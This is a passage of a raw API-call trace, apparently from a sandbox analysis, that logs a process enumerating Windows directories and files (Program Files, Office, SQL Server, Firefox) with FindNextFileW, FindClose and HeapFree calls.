ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="110", cAlternateFileName="")) returned 0 [0319.230] FindClose (in: hFindFile=0x3948768 | out: hFindFile=0x3948768) returned 1 [0319.230] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0319.233] FindNextFileW (in: hFindFile=0x39488e8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb142e44, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb142e44, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb142e44, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 0 [0319.234] FindClose (in: hFindFile=0x39488e8 | out: hFindFile=0x39488e8) returned 1 [0319.234] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0319.234] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e11c27d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2e11c27d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2e11c27d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Office", cAlternateFileName="MICROS~3")) returned 1 [0319.235] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0319.235] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft SQL Server", cAlternateFileName="MICROS~2")) returned 1 [0319.238] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.238] FindNextFileW (in: hFindFile=0x39488a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Shared", cAlternateFileName="")) returned 0 [0319.238] FindClose (in: hFindFile=0x39488a8 | out: hFindFile=0x39488a8) returned 1 [0319.238] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0319.238] FindNextFileW (in: hFindFile=0x3948828, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="110", cAlternateFileName="")) returned 0 [0319.238] FindClose (in: hFindFile=0x3948828 | out: hFindFile=0x3948828) returned 1 [0319.238] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0319.238] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a046b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a046b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a046b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0319.239] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.239] FindNextFileW (in: hFindFile=0x3948428, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a046b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a046b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a046b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="110", cAlternateFileName="")) returned 0 [0319.239] FindClose (in: hFindFile=0x3948428 | out: hFindFile=0x3948428) returned 1 [0319.240] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0319.240] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a046b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a046b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a046b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADOMD.NET", cAlternateFileName="")) returned 0 [0319.240] FindClose (in: hFindFile=0x39489a8 | out: hFindFile=0x39489a8) returned 1 [0319.240] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0319.240] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a046b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a046b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a046b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 0 [0319.240] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0319.240] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0319.240] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x17c93f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17c93f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ProgramFilesX86", cAlternateFileName="PROGRA~2")) returned 1 [0319.244] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0319.244] FindNextFileW (in: hFindFile=0x3948828, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa937f07, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2b015b1d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2b0d4700, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x128848, dwReserved0=0x0, dwReserved1=0x0, cFileName="dbghelp.dll", cAlternateFileName="")) returned 1 [0319.245] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0319.245] FindNextFileW (in: hFindFile=0x3948b68, lpFindFileData=0x2e8e69c | out: lpFindFileData=0x2e8e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf3143659, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61fd8b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0319.245] FindClose (in: hFindFile=0x3948b68 | out: hFindFile=0x3948b68) returned 1 [0319.245] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0319.245] FindNextFileW (in: hFindFile=0x3948828, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5e91324, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5e91324, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5eb74f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17a50, dwReserved0=0x0, dwReserved1=0x0, cFileName="SQLDumper.exe", cAlternateFileName="SQLDUM~1.EXE")) returned 1 [0319.246] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.246] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2b0d4700, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2b0d4700, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="110", cAlternateFileName="")) returned 0 [0319.246] FindClose (in: hFindFile=0x39489a8 | out: hFindFile=0x39489a8) returned 1 [0319.246] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0319.249] FindNextFileW (in: hFindFile=0x3948b28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf17ee5c3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf17ee5c3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 0 [0319.249] FindClose (in: hFindFile=0x3948b28 | out: hFindFile=0x3948b28) returned 1 [0319.249] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0319.249] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2f517e4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2f517e4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2f517e4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0319.255] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.255] FindNextFileW (in: hFindFile=0x3948828, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x386b77a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x386b77a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x386b77a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="APDEA0~1.DLL")) returned 1 [0319.258] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0319.258] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2c4a611d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2c4a611d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2c4a611d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x21276, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessCompare.rdlc", cAlternateFileName="ACCESS~1.RDL")) returned 1 [0319.787] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0319.787] FindNextFileW (in: hFindFile=0x39489a8, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2c4a611d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2c4a611d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2c4a611d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMessageDismissal.txt", cAlternateFileName="EXCELM~1.TXT")) returned 1 [0319.790] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.790] FindNextFileW (in: hFindFile=0x3948828, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c3c0a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4c3c0a4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4c3c0a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x171878, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="GROOVEEX.DLL", cAlternateFileName="")) returned 1 [0319.795] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0319.795] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2f517e4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office16", cAlternateFileName="")) returned 0 [0319.795] FindClose (in: hFindFile=0x39485a8 | out: hFindFile=0x39485a8) returned 1 [0319.795] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0319.798] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c93f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17c93f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17c93f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft SQL Server", cAlternateFileName="MICROS~3")) returned 1 [0319.801] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.801] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c93f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17c93f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17c93f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Shared", cAlternateFileName="")) returned 0 [0319.801] FindClose (in: hFindFile=0x3948768 | out: hFindFile=0x3948768) returned 1 [0319.801] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0319.801] FindNextFileW (in: hFindFile=0x39488a8, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c93f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17c93f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17c93f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="110", cAlternateFileName="")) returned 0 [0319.801] FindClose (in: hFindFile=0x39488a8 | out: hFindFile=0x39488a8) returned 1 [0319.801] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0319.801] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16be2c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16be2c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16be2c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0319.802] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.802] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16be2c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16be2c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16be2c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="110", cAlternateFileName="")) returned 0 [0319.802] FindClose (in: hFindFile=0x39485e8 | out: hFindFile=0x39485e8) returned 1 [0319.802] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0319.802] FindNextFileW (in: hFindFile=0x3948b28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16be2c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16be2c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16be2c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADOMD.NET", cAlternateFileName="")) returned 0 [0319.802] FindClose (in: hFindFile=0x3948b28 | out: hFindFile=0x3948b28) returned 1 [0319.802] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0319.802] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60db08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 1 [0319.803] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0319.803] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60db08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="plugins", cAlternateFileName="")) returned 0 [0319.803] FindClose (in: hFindFile=0x3948768 | out: hFindFile=0x3948768) returned 1 [0319.803] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0319.803] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60db08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 0 [0319.803] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0319.803] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0319.803] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee8d7d1d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee8d7d1d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0319.807] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0319.807] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b6194c4, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b6194c4, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="SystemX86", cAlternateFileName="SYSTEM~1")) returned 1 [0319.810] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0319.810] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0319.811] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0319.811] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a65087, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5a65087, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5a65087, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.0.0.0__71E9BCE111E9429C", cAlternateFileName="1600~1.0__")) returned 0 [0319.811] FindClose (in: hFindFile=0x3948768 | out: hFindFile=0x3948768) returned 1 [0319.811] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0319.811] FindNextFileW (in: hFindFile=0x3948428, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a65087, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5a65087, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5a65087, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft.Office.Access.BusinessDataCatalog", cAlternateFileName="MICROS~1.BUS")) returned 0 [0319.812] FindClose (in: hFindFile=0x3948428 | out: hFindFile=0x3948428) returned 1 [0319.812] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0319.812] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1d97f24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x863456d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GAC_MSIL", cAlternateFileName="")) returned 1 [0319.812] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: 